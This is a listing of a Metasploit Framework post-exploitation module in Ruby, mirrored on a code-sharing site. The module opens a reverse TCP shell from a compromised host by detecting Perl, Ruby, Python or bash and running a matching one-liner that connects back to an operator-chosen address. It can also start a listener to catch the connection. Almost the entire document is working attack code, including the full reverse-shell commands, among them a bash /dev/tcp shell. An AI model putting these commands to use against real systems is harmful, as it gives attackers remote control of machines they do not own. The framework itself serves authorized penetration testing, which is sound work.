Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/multi/manage/system_session.rb
19566 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7


8
  def initialize(info = {})

9
    super(

10
      update_info(

11
        info,

12
        'Name' => 'Multi Manage System Remote TCP Shell Session',

13
        'Description' => %q{

14
          This module will create a Reverse TCP Shell on the target system

15
          using the system's own scripting environments installed on the

16
          target.

17
        },

18
        'License' => MSF_LICENSE,

19
        'Author' => ['Carlos Perez <carlos_perez[at]darkoperator.com>'],

20
        'Platform' => %w[linux osx unix],

21
        'SessionTypes' => [ 'meterpreter', 'shell' ],

22
        'Notes' => {

23
          'Stability' => [CRASH_SAFE],

24
          'SideEffects' => [IOC_IN_LOGS],

25
          'Reliability' => []

26
        }

27
      )

28
    )

29
    register_options(

30
      [

31
        OptAddressLocal.new('LHOST',

32
                            [true, 'IP of host that will receive the connection from the payload.']),

33
        OptInt.new('LPORT',

34
                   [false, 'Port for Payload to connect to.', 4433]),

35
        OptBool.new('HANDLER',

36
                    [ true, 'Start an exploit/multi/handler to receive the connection', false]),

37
        OptEnum.new('TYPE', [

38
          true, 'Scripting environment on target to use for reverse shell',

39
          'auto', ['auto', 'ruby', 'python', 'perl', 'bash']

40
        ])

41
      ]

42
    )

43
  end

44


45
  def run

46
    create_multihand(datastore['LHOST'], datastore['LPORT']) if datastore['HANDLER']

47
    lhost = datastore['LHOST']

48
    lport = datastore['LPORT']

49
    cmd = ''

50


51
    begin

52
      case datastore['TYPE']

53
      when /auto/i

54
        cmd = auto_create_session(lhost, lport)

55
      when /ruby/i

56
        cmd = ruby_session(lhost, lport)

57
      when /python/i

58
        cmd = python_session(lhost, lport)

59
      when /perl/i

60
        cmd = perl_session(lhost, lport)

61
      when /bash/i

62
        cmd = bash_session(lhost, lport)

63
      end

64
    rescue StandardError => e

65
      vprint_error(e.message)

66
    end

67


68
    if !cmd.empty?

69
      print_status("Executing reverse tcp shell to #{lhost} on port #{lport}")

70
      cmd_exec("(#{cmd} &)")

71
    end

72
  end

73


74
  # Runs a reverse tcp shell with the scripting environment found

75
  def auto_create_session(lhost, lport)

76
    cmd = ''

77


78
    if cmd_exec('perl -v') =~ /Larry/

79
      print_status('Perl was found on target')

80
      cmd = perl_session(lhost, lport)

81
      vprint_status("Running #{cmd}")

82


83
    elsif cmd_exec('ruby -v') =~ /revision/i

84
      print_status('Ruby was found on target')

85
      cmd = ruby_session(lhost, lport)

86
      vprint_status("Running #{cmd}")

87


88
    elsif cmd_exec('python -V') =~ /Python 2\.(\d)/

89
      print_status('Python was found on target')

90
      cmd = python_session(lhost, lport)

91
      vprint_status("Running #{cmd}")

92


93
    elsif cmd_exec('bash --version') =~ /GNU bash/

94
      print_status('Bash was found on target')

95
      cmd = bash_session(lhost, lport)

96
      vprint_status("Running #{cmd}")

97
    else

98
      print_error('No scripting environment found with which to create a remote reverse TCP Shell with.')

99
    end

100


101
    return cmd

102
  end

103


104
  # Method for checking if a listner for a given IP and port is present

105
  # will return true if a conflict exists and false if none is found

106
  def check_for_listner(lhost, lport)

107
    conflict = false

108
    client.framework.jobs.each_value do |j|

109
      next unless j.name =~ %r{ multi/handler}

110


111
      current_id = j.jid

112
      current_lhost = j.ctx[0].datastore['LHOST']

113
      current_lport = j.ctx[0].datastore['LPORT']

114
      if (lhost == current_lhost) && (lport == current_lport.to_i)

115
        print_error("Job #{current_id} is listening on IP #{current_lhost} and port #{current_lport}")

116
        conflict = true

117
      end

118
    end

119
    return conflict

120
  end

121


122
  # Starts a exploit/multi/handler session

123
  def create_multihand(lhost, lport)

124
    pay = client.framework.payloads.create('generic/shell_reverse_tcp')

125
    pay.datastore['LHOST'] = lhost

126
    pay.datastore['LPORT'] = lport

127
    print_status('Starting exploit/multi/handler')

128
    if !check_for_listner(lhost, lport)

129
      # Set options for module

130
      mul = client.framework.exploits.create('multi/handler')

131
      mul.share_datastore(pay.datastore)

132
      mul.datastore['WORKSPACE'] = client.workspace

133
      mul.datastore['PAYLOAD'] = 'generic/shell_reverse_tcp'

134
      mul.datastore['EXITFUNC'] = 'thread'

135
      mul.datastore['ExitOnSession'] = false

136
      # Validate module options

137
      mul.options.validate(mul.datastore)

138
      # Execute showing output

139
      mul.exploit_simple(

140
        'Payload' => mul.datastore['PAYLOAD'],

141
        'LocalInput' => user_input,

142
        'LocalOutput' => user_output,

143
        'RunAsJob' => true

144
      )

145
    else

146
      print_error('Could not start handler!')

147
      print_error('A job is listening on the same Port')

148
    end

149
  end

150


151
  # Perl reverse TCP Shell

152
  def perl_session(lhost, lport)

153
    if cmd_exec('perl -v') =~ /Larry/

154
      print_status('Perl reverse shell selected')

155
      cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET " \

156
            "(PeerAddr,\"#{lhost}:#{lport}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"

157
    else

158
      print_error('No scripting environment found for the selected type.')

159
      cmd = ''

160
    end

161
    return cmd

162
  end

163


164
  # Ruby reverse TCP Shell

165
  def ruby_session(lhost, lport)

166
    if cmd_exec('ruby -v') =~ /revision/i

167
      print_status('Ruby reverse shell selected')

168
      return "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"#{lhost}\",\"#{lport}\");" \

169
             "while(cmd=c.gets);begin;IO.popen(cmd,\"r\"){|io|c.print io.read};rescue;end;end'"

170
    else

171
      print_error('No scripting environment found for the selected type.')

172
      cmd = ''

173
    end

174
    return cmd

175
  end

176


177
  # Python reverse TCP Shell

178
  def python_session(lhost, lport)

179
    if cmd_exec('python -V') =~ /Python 2\.(\d)/

180
      print_status('Python reverse shell selected')

181
      return "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET," \

182
             "socket.SOCK_STREAM);s.connect((\"#{lhost}\",#{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);" \

183
             "os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"

184
    else

185
      print_error('No scripting environment found for the selected type.')

186
      cmd = ''

187
    end

188
    return cmd

189
  end

190


191
  # Bash reverse TCP Shell

192
  def bash_session(lhost, lport)

193
    if cmd_exec('bash --version') =~ /GNU bash/

194
      print_status('Bash reverse shell selected')

195
      return "bash -c 'nohup bash -i >& /dev/tcp/#{lhost}/#{lport} 0>&1'"

196
    else

197
      print_error('No scripting environment found for the selected type.')

198
      cmd = ''

199
    end

200
    return cmd

201
  end

202
end

203


204